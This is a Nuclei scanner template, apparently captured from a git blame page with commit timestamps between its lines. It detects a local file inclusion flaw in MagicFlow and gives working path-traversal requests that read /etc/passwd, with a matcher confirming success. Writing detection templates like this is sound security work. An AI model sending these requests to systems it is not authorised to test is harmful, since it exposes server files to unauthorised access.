2021-07-21 05:18:00 +00:00
id : magicflow-lfi
info :
name : MagicFlow - Local File Inclusion
author : gy741
2022-08-29 20:21:30 +00:00
severity : high
2022-05-31 08:55:40 +00:00
description : |
MagicFlow is susceptible to local file inclusion vulnerabilities because it allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter.
2022-04-22 10:38:41 +00:00
reference :
- https://www.seebug.org/vuldb/ssvid-89258
2022-05-30 13:57:24 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score : 8.6
cwe-id : CWE-22
2021-07-21 05:18:00 +00:00
tags : magicflow,lfi
requests :
- method : GET
path :
- "{{BaseURL}}/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd"
- "{{BaseURL}}/msa/../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
2022-05-31 08:55:40 +00:00
part : body
2021-07-21 05:18:00 +00:00
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-21 05:18:00 +00:00
- type : status
status :
- 200
2022-05-30 13:57:24 +00:00
# Enhanced by mp on 2022/05/30